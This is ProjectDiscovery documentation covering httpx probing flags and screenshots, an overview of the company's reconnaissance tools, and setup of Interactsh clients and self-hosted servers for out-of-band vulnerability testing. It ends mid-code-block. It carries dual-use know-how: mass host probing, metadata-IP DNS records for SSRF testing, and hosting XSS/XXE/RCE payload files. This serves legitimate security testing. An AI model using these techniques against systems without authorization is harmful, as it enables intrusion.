Rendered DOM body is also included in json line output when `-screenshot` option is used with `-json` option.
To use this feature, add the `-screenshot` flag to the `httpx` command.
`httpx -screenshot -u https://example.com`
Screenshots are captured using a headless browser, and as a result `httpx` will be slower when using the `-screenshot` option.
#### Domain, Subdomain, and Path Support
The `-screenshot` option is versatile and can be used to capture screenshots for domains, subdomains, and even specific paths when used in conjunction with the `-path` option:
```
httpx -screenshot -u example.com
httpx -screenshot -u https://example.com/login
httpx -screenshot -path fuzz_path.txt -u https://example.com
```
#### Using with Other Tools
In the example below we're providing subfinder output to the `httpx` screenshot.
```
subfinder -d example.com | httpx -screenshot
```
#### System Chrome Support
By default, `httpx` uses the go-rod library to install and manage Chrome for taking screenshots.
However, if you prefer to use your locally installed system Chrome, add the `-system-chrome` flag:
```
httpx -screenshot -system-chrome -u https://example.com
```
#### Output Directory
Screenshots are stored in the output/screenshot directory by default. To specify a custom output directory, use the `-srd` option:
```
httpx -screenshot -srd /path/to/custom/directory -u https://example.com
```
#### Body Preview
Body preview shows first N characters of response. And strip html tags in response.
```
httpx -u https://example.com -silent -body-preview
https://example.com [Example Domain This domain is for use in illustrative examples in documents. You may use this domai]
```
```
httpx -u https://example.com -silent -body-preview=200 -strip=html
https://example.com [Example Domain This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission. More information...]
```
# Httpx Usage
Learn httpx usage including flags, probes, and options
## Access help
Use `httpx - h` to display all help options.
## Httpx help options
```
Flags:
INPUT:
-l, -list string input file containing list of hosts to process
-rr, -request string file containing raw request
-u, -target string[] input target host(s) to probe
PROBES:
-sc, -status-code display response status-code
-cl, -content-length display response content-length
-ct, -content-type display response content-type
-location display response redirect location
-favicon display mmh3 hash for '/favicon.ico' file
-hash string display response body hash (supported: md5,mmh3,simhash,sha1,sha256,sha512)
-jarm display jarm fingerprint hash
-rt, -response-time display response time
-lc, -line-count display response body line count
-wc, -word-count display response body word count
-title display page title
-bp, -body-preview display first N characters of response body (default 100)
-server, -web-server display server name
-td, -tech-detect display technology in use based on wappalyzer dataset
-method display http request method
-websocket display server using websocket
-ip display host ip
-cname display host cname
-asn display host asn information
-cdn display cdn/waf in use
-probe display probe status
HEADLESS:
-ss, -screenshot enable saving screenshot of the page using headless browser
-system-chrome enable using local installed chrome for screenshot
-esb, -exclude-screenshot-bytes enable excluding screenshot bytes from json output
-ehb, -exclude-headless-body enable excluding headless header from json output
MATCHERS:
-mc, -match-code string match response with specified status code (-mc 200,302)
-ml, -match-length string match response with specified content length (-ml 100,102)
-mlc, -match-line-count string match response body with specified line count (-mlc 423,532)
-mwc, -match-word-count string match response body with specified word count (-mwc 43,55)
-mfc, -match-favicon string[] match response with specified favicon hash (-mfc 1494302000)
-ms, -match-string string match response with specified string (-ms admin)
-mr, -match-regex string match response with specified regex (-mr admin)
-mcdn, -match-cdn string[] match host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
-mrt, -match-response-time string match response with specified response time in seconds (-mrt '< 1')
-mdc, -match-condition string match response with dsl expression condition
EXTRACTOR:
-er, -extract-regex string[] display response content with matched regex
-ep, -extract-preset string[] display response content matched by a pre-defined regex (ipv4,mail,url)
FILTERS:
-fc, -filter-code string filter response with specified status code (-fc 403,401)
-fep, -filter-error-page filter response with ML based error page detection
-fl, -filter-length string filter response with specified content length (-fl 23,33)
-flc, -filter-line-count string filter response body with specified line count (-flc 423,532)
-fwc, -filter-word-count string filter response body with specified word count (-fwc 423,532)
-ffc, -filter-favicon string[] filter response with specified favicon hash (-ffc 1494302000)
-fs, -filter-string string filter response with specified string (-fs admin)
-fe, -filter-regex string filter response with specified regex (-fe admin)
-fcdn, -filter-cdn string[] filter host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
-frt, -filter-response-time string filter response with specified response time in seconds (-frt '> 1')
-fdc, -filter-condition string filter response with dsl expression condition
-strip strips all tags in response. supported formats: html,xml (default html)
RATE-LIMIT:
-t, -threads int number of threads to use (default 50)
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
MISCELLANEOUS:
-pa, -probe-all-ips probe all the ips associated with same host
-p, -ports string[] ports to probe (nmap syntax: eg http:1,2-10,11,https:80)
-path string path or list of paths to probe (comma-separated, file)
-tls-probe send http probes on the extracted TLS domains (dns_name)
-csp-probe send http probes on the extracted CSP domains
-tls-grab perform TLS(SSL) data grabbing
-pipeline probe and display server supporting HTTP1.1 pipeline
-http2 probe and display server supporting HTTP2
-vhost probe and display server supporting VHOST
-ldv, -list-dsl-variables list json output field keys name that support dsl matcher/filter
UPDATE:
-up, -update update httpx to latest version
-duc, -disable-update-check disable automatic httpx update check
OUTPUT:
-o, -output string file to write output results
-oa, -output-all filename to write output results in all formats
-sr, -store-response store http response to output directory
-srd, -store-response-dir string store http response to custom directory
-csv store output in csv format
-csvo, -csv-output-encoding string define output encoding
-j, -json store output in JSONL(ines) format
-irh, -include-response-header include http response (headers) in JSON output (-json only)
-irr, -include-response include http request/response (headers + body) in JSON output (-json only)
-irrb, -include-response-base64 include base64 encoded http request/response in JSON output (-json only)
-include-chain include redirect http chain in JSON output (-json only)
-store-chain include http redirect chain in responses (-sr only)
-svrc, -store-vision-recon-cluster include visual recon clusters (-ss and -sr only)
CONFIGURATIONS:
-config string path to the httpx configuration file (default $HOME/.config/httpx/config.yaml)
-r, -resolvers string[] list of custom resolver (file or comma separated)
-allow string[] allowed list of IP/CIDR's to process (file or comma separated)
-deny string[] denied list of IP/CIDR's to process (file or comma separated)
-sni, -sni-name string custom TLS SNI name
-random-agent enable Random User-Agent to use (default true)
-H, -header string[] custom http headers to send with request
-http-proxy, -proxy string http proxy to use (eg http://127.0.0.1:8080)
-unsafe send raw requests skipping golang normalization
-resume resume scan using resume.cfg
-fr, -follow-redirects follow http redirects
-maxr, -max-redirects int max number of redirects to follow per host (default 10)
-fhr, -follow-host-redirects follow redirects on the same host
-rhsts, -respect-hsts respect HSTS response headers for redirect requests
-vhost-input get a list of vhosts as input
-x string request methods to probe, use 'all' to probe all HTTP methods
-body string post body to include in http request
-s, -stream stream mode - start elaborating input targets without sorting
-sd, -skip-dedupe disable dedupe input items (only used with stream mode)
-ldp, -leave-default-ports leave default http/https ports in host header (eg. http://host:80 - https://host:443
-ztls use ztls library with autofallback to standard one for tls13
-no-decode avoid decoding body
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
-no-stdin Disable Stdin processing
DEBUG:
-health-check, -hc run diagnostic check up
-debug display request/response content in cli
-debug-req display request content in cli
-debug-resp display response content in cli
-version display httpx version
-stats display scan statistic
-profile-mem string optional httpx memory profile dump file
-silent silent mode
-v, -verbose verbose mode
-si, -stats-interval int number of seconds to wait between showing a statistics update (default: 5)
-nc, -no-color disable colors in cli output
OPTIMIZATIONS:
-nf, -no-fallback display both probed protocol (HTTPS and HTTP)
-nfs, -no-fallback-scheme probe with protocol scheme specified in input
-maxhr, -max-host-error int max error count per host before skipping remaining path/s (default 30)
-ec, -exclude-cdn skip full port scans for CDN/WAF (only checks for 80,443)
-retries int number of retries
-timeout int timeout in seconds (default 10)
-delay value duration between each http request (eg: 200ms, 1s) (default -1ns)
-rsts, -response-size-to-save int max response size to save in bytes (default 2147483647)
-rstr, -response-size-to-read int max response size to read in bytes (default 2147483647)
```
## Notes on usage
* As default an `httpx` probe with an HTTPS scheme will fall-back to HTTP only if HTTPS is not reachable.
* The `-no-fallback` flag can be used to probe and display both HTTP and HTTPS result.
* Custom scheme for ports can be defined, for example `-ports http:443,http:80,https:8443`
* Custom resolver supports multiple protocol (doh|tcp|udp) in form of protocol:resolver:port (for example `udp:127.0.0.1:53`)
* The following flags should be used for specific use cases instead of running them as default with other probes:
* `- ports`
* `- path`
* `- vhost`
* `- screenshot`
* `- csp-probe`
* `- tls-probe`
* `- favicon`
* `- http2`
* `- pipeline`
* `- tls-impersonate`
# Open Source Tools
Learn about ProjectDiscovery's Open Source Tools
Let's delve into the specifics of each category and its corresponding tools.
## Discover
In the discovery phase, the goal is to map out the entire's online presence, finding subdomains, open ports, and other valuable endpoints. The tools in this category are instrumental in revealing a comprehensive view of the target's landscape. This stage includes tools like:
A robust tool focused on passive subdomain enumeration, providing a holistic
view of a target's online assets.
A comprehensive tool for enumerating assets across multiple cloud providers,
ensuring visibility into the cloud-based infrastructure of your target.
A lightning-fast port scanner designed to swiftly identify open ports on
target hosts, ensuring no potential entry point is overlooked.
A next-generation web crawling framework designed to navigate and parse web
content efficiently, revealing hidden details of web assets.
Offering an internet-wide asset data source, Chaos is crucial for expanding
the scope of your asset discovery efforts.
Designed to search and highlight exposed hosts across various APIs, ensuring
that no stone is left unturned in the discovery phase.
Quickly map an organization's network ranges using autonomous system number
(ASN) information.
Fast and customizable subdomain wordlist generator using DSL.
massDNS wrapper to bruteforce and resolve the subdomains with wildcard handling support
## Enrich
Once assets are discovered, the next step is to enrich the gathered data. This phase involves understanding the nature of the assets, the technologies behind them, and their exposure level. This stage includes tools like:
An essential HTTP toolkit that probes services, identifying crucial details
about web servers, status codes, and other valuable metadata.
A versatile DNS toolkit that allows for efficient operations such as mass
DNS resolutions, wildcard testing, and more.
Specialized for TLS-based data collection, Tlsx offers insights into
certificates, cipher suites, and other SSL/TLS details of a target.
## Detect
With the landscape mapped and details enriched, the next phase is detection. Here, the aim is to pinpoint exploitable vulnerabilities, ensuring a thorough risk assessment. This stage includes tools like:
A vulnerability scanner designed to identify exploitable weaknesses in the
attack surface with a vast library of templates for various known
vulnerabilities.
An out-of-band (OOB) interaction gathering library, essential for
identifying vulnerabilities that may not be immediately evident through
conventional scanning methods.
Navigate the Common Vulnerabilities and Exposures (CVE) jungle with ease using cvemap, a CLI tool designed to provide a structured and easily navigable interface to various vulnerability databases.
Streamlining the workflow, Notify allows users to stream the output of
various tools to multiple platforms, ensuring real-time updates and alerts.
## Utilities
These utilities can be combined with our other tooling based on the [Unix philosophy](https://blog.projectdiscovery.io/how-projectdiscovery-applies-the-unix-philosophy-to-their-tools/) to create pipelines and customize your offensive security or bug bounty hunting program.
pdtm is a simple and easy-to-use tool for managing all of the open source
projects from ProjectDiscovery.
A utility program to perform multiple operations for a given subnet/CIDR
ranges.
A utility to detect various technologies for a given DNS / IP address.
AIx is a cli tool to interact with Large Language Models (LLM) APIs.
Swiss Army Knife Proxy for rapid deployments.
A golang enhanced version of the well known python simplehttpserver.
***
Dive into the individual tool's documentation to explore in-depth functionalities, usage examples, and best practices. Your journey into enhanced offensive security starts here!
# Interactsh Install
Learn how to install Interactsh and get started
Enter the command below in a terminal to install ProjectDiscovery's Interactsh.
```bash
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
```
## Installation Notes
* The Interactsh CLI client requires the latest version of [**Go**](https://go.dev/doc/install)
# Interactsh Integrations
Learn about integrating interactsh with other tools
## Burp Suite Extension
[interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator) is Burp Suite extension developed and maintained by [@wdahlenb](https://twitter.com/wdahlenb)
* Download latest JAR file from [releases](https://github.com/wdahlenburg/interactsh-collaborator/releases) page.
* Open Burp Suite → Extender → Add → Java → Select JAR file → Next
* New tab named **Interactsh** will be appeared upon successful installation.
* See the [interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator) project for more info.
![image](https://user-images.githubusercontent.com/8293321/135176099-0e3fa01c-bdce-4f04-a94f-de0a34c7abf6.png)
\## ZAP Add-On
Interactsh can be used with OWASP ZAP via the [OAST add-on for ZAP](https://www.zaproxy.org/docs/desktop/addons/oast-support/). With ZAP's scripting capabilities, you can create powerful out-of-band scan rules that leverage Interactsh's features. A standalone script template has been provided as an example (it is added automatically when you install the add-on).
* Install the OAST add-on from the [ZAP Marketplace](https://www.zaproxy.org/addons/).
* Go to Tools → Options → OAST and select **Interactsh**.
* Configure [the options](https://www.zaproxy.org/docs/desktop/addons/oast-support/services/interactsh/options/) for the client and click on "New Payload" to generate a new payload.
* OOB interactions will appear in the [OAST Tab](https://www.zaproxy.org/docs/desktop/addons/oast-support/tab/) and you can click on any of them to view the full request and response.
* You can set Interactsh as the default for ActiveScan in the `Options` > `OAST` > `General` menu.
* When checking the `Use Permanent Database` option, you can review interactions that occurred after ZAP was terminated.
* See the [OAST add-on documentation](https://www.zaproxy.org/docs/desktop/addons/oast-support/) for more info.
![zap](https://user-images.githubusercontent.com/16446369/135211920-ed24ba5a-5547-4cd4-b6d8-656af9592c20.png)
*Interactsh in ZAP*
# Interactsh Overview
A tool for detecting out-of-band vulnerabilities
**Interactsh** is an open-source tool developed by ProjectDiscovery for detecting [out-of-band (OOB) vulnerabilities](https://portswigger.net/burp/application-security-testing/oast). These are vulnerabilities that may not be identified using conventional tools or methods. Interactsh operates by generating dynamic URLs. When these URLs are requested by a target, they trigger a callback. This callback can then be monitored and analyzed to identify potential vulnerabilities in the target.
Check out [our blog introducing Interactsh](https://blog.projectdiscovery.io/interactsh-release/) and [view the repo here](https://github.com/projectdiscovery/interactsh).
# Features
* DNS/HTTP(S)/SMTP(S)/LDAP Interaction
* CLI / Web / Burp / ZAP / Docker client
* AES encryption with zero logging
* Automatic ACME based Wildcard TLS w/ Auto Renewal
* DNS Entries for Cloud Metadata service
* Dynamic HTTP Response control
* Self-Hosted Interactsh Server
* Multiple domain support **(self-hosted)**
* NTLM/SMB/FTP/RESPONDER Listener **(self-hosted)**
* Wildcard / Protected Interactions **(self-hosted)**
* Customizable Index / File hosting **(self-hosted)**
* Customizable Payload Length **(self-hosted)**
* Custom SSL Certificate **(self-hosted)**
## Client & Server
The Interactsh tool comprises two main components: [`interachsh-cleint`](/tools/interactsh/running) and [`interachsh-server`](/tools/interactsh/server). Each plays a critical role in the process of detecting out-of-band vulnerabilities, but they operate in distinct manners and serve different purposes.
### Interactsh Server
* Function: Captures and records callbacks from interaction URLs.
* Deployment: Hosted publicly to receive requests from tested systems.
* Use Case: Ideal for those hosting their instance for privacy or control.
ProjectDiscovery maintains a number of [publically accessable interactsh servers](/tools/interactsh/running#projectdiscovery-interachsh-servers) that you can use in order to only run the client for your specific use case. Alternatively, you can [self host your own interactsh server](/tools/interactsh/running#self-hosted-interactsh-server) if you want it to run on your custom domain or you need more control over the server side interactions.
### Interactsh Client
* Function: Generates URLs for testing, retrieves interaction logs from the server.
* Deployment: Runs locally for managing URLs and analyzing captured data.
* Use Case: Used by testers to create and analyze tests for out-of-band vulnerabilities.
## Support
Questions about using Interactsh? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Interactsh interactsh-client
Learn about running Interactsh with examples and detailed output
For all of the flags and options available for **Interactsh** be sure to check out the [Usage](/tools/interactsh/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
The command `interact-client` generates a unique payload that can be used for Out-Of-Band (OOB) testing with minimal interactin in the output.
```console
interactsh-client
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v0.0.5
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c23b2la0kl1krjcrdj10cndmnioyyyyyn.oast.pro
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (A) from 172.253.226.100 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (AAAA) from 32.3.34.129 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received HTTP interaction from 43.22.22.50 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (MX) from 43.3.192.3 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (TXT) from 74.32.183.135 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received SMTP interaction from 32.85.166.50 at 2021-26-26 12:26
```
## Session File
`interactsh-client` with `-sf, -session-file` flag can be used to store/read the current session information from user defined file. This functionality is useful to resume the same session to poll the interactions even after the client gets stopped or closed.
```console
interactsh-client -sf interact.session
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.3
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c23b2la0kl1krjcrdj10cndmnioyyyyyn.oast.pro
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (A) from 172.253.226.100 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (AAAA) from 32.3.34.129 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received HTTP interaction from 43.22.22.50 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (MX) from 43.3.192.3 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (TXT) from 74.32.183.135 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received SMTP interaction from 32.85.166.50 at 2021-26-26 12:26
```
## Verbose Mode
Running the `interactsh-client` in **verbose mode** (v) allows you to to see the whole request and response, along with an output file to analyze afterwards.
```console
interactsh-client -v -o interactsh-logs.txt
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.3
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
[c58bduhe008dovpvhvugcfemp9yyyyyyn] Received HTTP interaction from 103.22.142.211 at 2021-09-26 18:08:07
------------
HTTP Request
------------
GET /favicon.ico HTTP/2.0
Host: c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
Referer: https://c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
-------------
HTTP Response
-------------
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.pro
nyyyyyy9pmefcguvhvpvod800ehudb85c
```
## Choosing a Server
When running `interactsh-client`, it is required that it can connect to a running `interactsh-server`. The Interactsh server captures and logs out-of-band interactions, while the client generates testing URLs and analyzes these interactions for vulnerabilities.
You can either use one of ProjectDiscovery's default interactsh servers or choose you run a self-hosted sever.
### ProjectDiscovery interachsh servers
We maintain a list of default Interactsh servers to use with `interactsh-client`:
* oast.pro
* oast.live
* oast.site
* oast.online
* oast.fun
* oast.me
Default servers are subject to change/rotate/down at any time, thus we recommend using a self-hosted interactsh server if you are experiencing issues with the default server.
### Self-Hosted interactsh Server
Using the `server` flag, `interactsh-client` can be configured to connect with a self-hosted Interactsh server, this flag accepts single or multiple server separated by comma.
```sh
interactsh-client -server hackwithautomation.com
```
**Using a Protected Self-Hosted Server**
Using the `token` flag, `interactsh-client` can connect to a self-hosted Interactsh server that is protected with authentication.
```sh
interactsh-client -server hackwithautomation.com -token XXX
```
## Using with Notify
If you are away from your terminal, you may use [notify](https://github.com/projectdiscovery/notify) to send a real-time interaction notification to any supported platform.
```sh
interactsh-client | notify
```
![image](https://user-images.githubusercontent.com/8293321/116283535-9bcac180-a7a9-11eb-94d5-0313d4812fef.png)
## Interactsh Web Client
[Interactsh-web](https://github.com/projectdiscovery/interactsh-web) is a free and open-source web client that displays Interactsh interactions in a well-managed dashboard in your browser. It uses the browser's local storage to store and display all incoming interactions. By default, the web client is configured to use **interact.sh** as default interactsh server, and supports other self-hosted public/authencaited interactsh servers as well.
A hosted instance of **interactsh-web** client is available at [https://app.interactsh.com](https://app.interactsh.com)
![image](https://user-images.githubusercontent.com/8293321/136621531-d72c9ece-0076-4db1-98c9-21dcba4ba09c.png)
## Interactsh Docker Client
A [Docker image](https://hub.docker.com/r/projectdiscovery/interactsh-client) is also provided with interactsh client that is ready to run and can be used in the following way:
```sh
docker run projectdiscovery/interactsh-client:latest
```
```console
docker run projectdiscovery/interactsh-client:latest
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.oast.pro
```
## Integrations
### Burp Suite Extension
See [integrations](/tools/interactsh/integrations) for more details on the [interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator).
### ZAP Add-On
See [integrations](/tools/interactsh/integrations) for more details on using interactsh with ZAP.
### Use as library
The [examples](https://github.com/projectdiscovery/interactsh/tree/main/examples) show using the interactsh client library to get external interactions for a generated URL by making a http request to the URL.
### Nuclei - OAST
[Nuclei](https://github.com/projectdiscovery/nuclei) vulnerability scanner utilize **Interactsh** for automated payload generation and detection of out of band based security vulnerabilities.
See [Nuclei + Interactsh](https://blog.projectdiscovery.io/nuclei-interactsh-integration/) Integration blog and [guide document](https://docs.projectdiscovery.io/templates/reference/oob-testing) for more information.
## Cloud Metadata
Interactsh server supports DNS records for cloud metadata services, which is useful for testing SSRF-related vulnerabilities.
Currently supported metadata services:
* [AWS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
* [Alibaba](https://www.alibabacloud.com/blog/alibaba-cloud-ecs-metadata-user-data-and-dynamic-data_594351)
Example:
* **aws.interact.sh** points to 169.254.169.254
* **alibaba.interact.sh** points to 100.100.100.200
# Interactsh Server
Learn about self-hosting an interactsh server
## Interactsh Server
Interactsh server runs multiple services and captures all the incoming requests. To host an instance of **interactsh-server**, you are required to setup:
1. Domain name with custom **host names** and **nameservers**.
2. Basic droplet running 24/7 in the background.
## Usage
```sh
interactsh-server -h
```
This will display help for the tool. Here are all the switches it supports.
```yaml
Usage:
./interactsh-server [flags]
Flags:
INPUT:
-d, -domain string[] single/multiple configured domain to use for server
-ip string public ip address to use for interactsh server
-lip, -listen-ip string public ip address to listen on (default "0.0.0.0")
-e, -eviction int number of days to persist interaction data in memory (default 30)
-ne, -no-eviction disable periodic data eviction from memory
-a, -auth enable authentication to server using random generated token
-t, -token string enable authentication to server using given token
-acao-url string origin url to send in acao header to use web-client) (default "*")
-sa, -skip-acme skip acme registration (certificate checks/handshake + TLS protocols will be disabled)
-se, -scan-everywhere scan canary token everywhere
-cidl, -correlation-id-length int length of the correlation id preamble (default 20)
-cidn, -correlation-id-nonce-length int length of the correlation id nonce (default 13)
-cert string custom certificate path
-privkey string custom private key path
-oih, -origin-ip-header string HTTP header containing origin ip (interactsh behind a reverse proxy)
CONFIG:
-config string flag configuration file (default "$HOME/.config/interactsh-server/config.yaml")
-dr, -dynamic-resp enable setting up arbitrary response data
-cr, -custom-records string custom dns records YAML file for DNS server
-hi, -http-index string custom index file for http server
-hd, -http-directory string directory with files to serve with http server
-ds, -disk disk based storage
-dsp, -disk-path string disk storage path
-csh, -server-header string custom value of Server header in response
-dv, -disable-version disable publishing interactsh version in response header
UPDATE:
-up, -update update interactsh-server to latest version
-duc, -disable-update-check disable automatic interactsh-server update check
SERVICES:
-dns-port int port to use for dns service (default 53)
-http-port int port to use for http service (default 80)
-https-port int port to use for https service (default 443)
-smtp-port int port to use for smtp service (default 25)
-smtps-port int port to use for smtps service (default 587)
-smtp-autotls-port int port to use for smtps autotls service (default 465)
-ldap-port int port to use for ldap service (default 389)
-ldap enable ldap server with full logging (authenticated)
-wc, -wildcard enable wildcard interaction for interactsh domain (authenticated)
-smb start smb agent - impacket and python 3 must be installed (authenticated)
-responder start responder agent - docker must be installed (authenticated)
-ftp start ftp agent (authenticated)
-smb-port int port to use for smb service (default 445)
-ftp-port int port to use for ftp service (default 21)
-ftp-dir string ftp directory - temporary if not specified
DEBUG:
-version show version of the project
-debug start interactsh server in debug mode
-ep, -enable-pprof enable pprof debugging server
-health-check, -hc run diagnostic check up
-metrics enable metrics endpoint
-v, -verbose display verbose interaction
```
## Getting started
### Configuring Interactsh domain
For this example, we will utilize GoDaddy for domain registration and a DigitalOcean droplet as the server, where a basic \$5 droplet efficiently supports a self-hosted Interactsh server. If using different tools, please follow your registrar's guidelines for creating or updating DNS entries.
* Navigate to `https://dcc.godaddy.com/manage/{{domain}}/dns/hosts`
* Advanced Features → Host names → Add → Submit `ns1`, `ns2` with your `SERVER_IP` as value
![image](https://user-images.githubusercontent.com/8293321/135175512-135259fb-0490-4038-845a-0b62b1b8f549.png)
* Navigate to `https://dns.godaddy.com/{{domain}}/nameservers`
* Click "I'll use my own nameservers" → Submit `ns1.INTERACTSH_DOMAIN`, `ns2.INTERACTSH_DOMAIN`
![image](https://user-images.githubusercontent.com/8293321/135175627-ea9639fd-353d-441b-a9a4-dae7f540d0ae.png)
### Configuring Interactsh server
Install `interactsh-server` on your **VPS**
```bash
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
```
Considering domain name setup is **completed**, run the below command to run `interactsh-server`
```bash
interactsh-server -domain INTERACTSH_DOMAIN
```
Following is an example of a successful installation and operation of a self-hosted server:
![image](https://user-images.githubusercontent.com/8293321/150676089-b5638c19-33a3-426a-987c-3ac6fa227012.png)
A number of needed flags are configured automatically to run `interactsh-server` with default settings. For example, `ip` and `listen-ip` flags set with the Public IP address of the system when possible.
### Running Interactsh Server
```console
interactsh-server -domain interact.sh
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Listening with the following services:
[HTTPS] Listening on TCP 46.101.25.250:443
[HTTP] Listening on TCP 46.101.25.250:80
[SMTPS] Listening on TCP 46.101.25.250:587
[LDAP] Listening on TCP 46.101.25.250:389
[SMTP] Listening on TCP 46.101.25.250:25
[DNS] Listening on TCP 46.101.25.250:53
[DNS] Listening on UDP 46.101.25.250:53
```
## Additional Server Options
### Using Multiple Domains
Multiple domain names can be given in the same way as above to run the same interactsh server across multiple **configured domains**.
```console
interactsh-server -d oast.pro,oast.me
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.5
projectdiscovery.io
[INF] Loading existing SSL Certificate for: [*.oast.pro, oast.pro]
[INF] Loading existing SSL Certificate for: [*.oast.me, oast.me]
[INF] Listening with the following services:
[HTTPS] Listening on TCP 46.101.25.250:443
[HTTP] Listening on TCP 46.101.25.250:80
[SMTPS] Listening on TCP 46.101.25.250:587
[LDAP] Listening on TCP 46.101.25.250:389
[SMTP] Listening on TCP 46.101.25.250:25
[DNS] Listening on TCP 46.101.25.250:53
[DNS] Listening on UDP 46.101.25.250:53
```
While running interactsh server on **Cloud VM**'s like Amazon EC2, Google Cloud Platform (GCP), it is required to update the security rules to allow **"all traffic"** for inbound connections.
There are more useful capabilities supported by `interactsh-server` that are not enabled by default and are intended to be used only by **self-hosted** servers.
### Hosting behind a reverse proxy
`interactsh-server` might require custom ports for services if the default ones are already busy. If this is the case but still default ports are required as part of the payload, it's possible to configure `interactsh-server` behind a reverse proxy, by port-forwarding HTTP/TCP/UDP based services via `http/stream` proxy directive (`proxy_pass`).
### Nginx
Assuming that `interactsh-server` essential services run on the following ports:
* HTTP: 8080/TCP
* HTTPS: 8440/TCP
* SMTP: 8025/TCP
* DNS: 8053/UDP
* DNS: 8053/TCP
The nginx configuration file to forward the traffic would look like the following one:
```conf
# http/https
http {
server {
listen 443 ssl;
server_name mysite.com;
ssl_certificate /etc/nginx/interactsh.pem;
ssl_certificate_key /etc/nginx/interactsh.key;
location / {
proxy_pass https://interachsh.mysite.com:80/;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
}
stream {
# smtp
server {
listen 25;
proxy_pass interachsh.mysite.com:8025;
}
# dns
server {
listen 53;
proxy_pass interachsh.mysite.com:8053;
}
server {
listen 53 udp;
proxy_pass interachsh.mysite.com:8053;
}
}
```
## Hosting Additional Data
### Custom Server Index
Index page for http server can be customized while running custom interactsh server using `-http-index` flag.
```console
interactsh-server -d hackwithautomation.com -http-index banner.html
```
`{DOMAIN}` placeholder is also supported in index file to replace with server domain name.
![image](https://user-images.githubusercontent.com/8293321/179397016-f6ee12e0-5b0b-42b6-83e7-f0972a804655.png)
### Static File Hosting
Interactsh http server optionally enables file hosting to help in security testing. This capability can be used with a self-hosted server to serve files for common payloads for **XSS, XXE, RCE** and other attacks.
To use this feature, `-http-directory` flag can be used which accepts diretory as input and files are served under `/s/` directory.
```console
